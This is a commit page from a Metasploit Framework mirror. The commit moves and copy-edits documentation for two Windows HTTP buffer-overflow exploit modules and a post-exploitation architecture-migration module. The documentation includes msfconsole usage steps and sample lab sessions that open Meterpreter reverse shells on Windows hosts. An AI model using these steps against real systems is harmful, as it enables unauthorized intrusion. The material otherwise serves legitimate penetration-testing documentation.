infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #8754, fix some module documentation

bug/bundler_fix
Pearce Barry 2017-07-23 11:44:07 -05:00
parent a140209c36 7c55cdc1c8
commit fb905c4bc7
No known key found for this signature in database
GPG Key ID: 0916F4DEA5C5DE0A
3 changed files with 31 additions and 28 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
modules/exploits/windows/http/easychatserver_seh.md → documentation/modules/exploit/windows/http/easychatserver_seh.md
View File

@ -1,16 +1,16 @@
## Description
This module exploits a vulnerability in the EFS Easy Chat Server application, from version 2 to 3.1, affecting the username parameter in Registration page 'register.ghp', which is prone to a stack overflow vulnerability.
This module exploits a vulnerability in the EFS Easy Chat Server application versions 2 through 3.1. The username parameter in the Registration page 'register.php', which is prone to a stack overflow vulnerability.
This module allows a remote attacker to get a payload executed under the context of the user running the Easy Chat Server application
This module allows a remote attacker to execute a payload under the context of the user running the Easy Chat Server application
## Vulnerable Application
[Easy Chat Server](http://echatserver.com/) Easy Chat Server is a easy, fast and affordable way to host and manage real-time communication software.
[Easy Chat Server](http://echatserver.com/) Easy Chat Server is an easy, fast and affordable way to host and manage real-time communication software.
This module has been tested successfully on
* Easy Chat Server 3.1 on Windows XP En SP3
* Easy Chat Server 3.1 on Windows XP En SP3
Installers:
@ -18,11 +18,11 @@ Installers:
## Verification Steps
1. Start `msfconsole`
2. Do: `use exploits/windows/http/easychatserver_seh`
3. Do: `set rhosts [IP]`
4. Do: `exploit`
5. You should get your payload executed
1. Start `msfconsole`
2. Do: `use exploits/windows/http/easychatserver_seh`
3. Do: `set rhosts [IP]`
4. Do: `exploit`
5. You should get your payload executed
## Scenarios
@ -32,11 +32,11 @@ msf > use exploit/windows/http/easychatserver_seh
msf exploit(easychatserver_seh) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(easychatserver_seh) > exploit
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Sending stage (957487 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1037) at 2017-06-20 00:43:51 +0200
meterpreter > sysinfo
Computer : MM-8B040C5B05D9
OS : Windows XP (Build 2600, Service Pack 3).
@ -47,7 +47,7 @@ Logged On Users : 2
Meterpreter : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.56.101 - Meterpreter session 1 closed. Reason: User exit
msf exploit(easychatserver_seh) >
```

22
modules/exploits/windows/http/easyfilesharing_post.md → documentation/modules/exploit/windows/http/easyfilesharing_post.md
View File

@ -1,8 +1,8 @@
## Description
This module exploits a vulnerability in the Easy File Sharing Web Server application, by exploiting an overflow in the Email Post parameter, through DEP bypass via ROP chain.
This module exploits a vulnerability in the Easy File Sharing Web Server application. It uses an overflow in the Email Post parameter, bypassing DEP via a ROP chain.
This module allows a remote attacker to get a payload executed under the context of the user running the Easy File Sharing application
This module allows a remote attacker to execute a payload under the context of the user running the Easy File Sharing application
## Vulnerable Application
@ -10,7 +10,7 @@ This module allows a remote attacker to get a payload executed under the context
This module has been tested successfully on
* Easy File Sharing 7.2 on Windows XP En Sp3
* Easy File Sharing 7.2 on Windows XP En Sp3
Installers:
@ -18,11 +18,11 @@ Installers:
## Verification Steps
1. Start `msfconsole`
2. Do: `use exploits/windows/http/easyfilesharing_post`
3. Do: `set rhosts [IP]`
4. Do: `exploit`
5. You should get your payload executed
1. Start `msfconsole`
2. Do: `use exploits/windows/http/easyfilesharing_post`
3. Do: `set rhosts [IP]`
4. Do: `exploit`
5. You should get your payload executed
## Scenarios
@ -32,11 +32,11 @@ msf > use exploit/windows/http/easyfilesharing_post
msf exploit(easyfilesharing_post) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(easyfilesharing_post) > exploit
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Sending stage (957487 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1253) at 2017-06-17 22:45:34 +0200
meterpreter > sysinfo
Computer : MM
OS : Windows XP (Build 2600, Service Pack 3).
@ -47,7 +47,7 @@ Logged On Users : 2
Meterpreter : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.56.101 - Meterpreter session 1 closed. Reason: User exit
msf exploit(easyfilesharing_post) >
```

13
modules/post/windows/manage/archmigrate.md → documentation/modules/post/windows/manage/archmigrate.md
View File

@ -1,5 +1,6 @@
## Creating A Testing Environment
To use this module you need an x86 executable type meterpreter on a x64 windows machine.
To use this module you need an x86 executable type meterpreter on a x64 windows machine.
This module has been tested against:
@ -23,9 +24,10 @@ This module was not tested against, but may work against:
### Windows 10 x64
```
msf exploit(handler) > run
[*] Started reverse TCP handler on <MSF_IP>:4567
[*] Started reverse TCP handler on <MSF_IP>:4567
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to <Win10x64_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x64_IP>:50917) at 2017-03-22 11:43:42 -0500
@ -39,8 +41,8 @@ This module was not tested against, but may work against:
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/manage/archmigrate
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/manage/archmigrate
msf post(archmigrate) > set session 1
session => 1
msf post(archmigrate) > run
@ -70,4 +72,5 @@ This module was not tested against, but may work against:
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
Meterpreter : x64/windows
```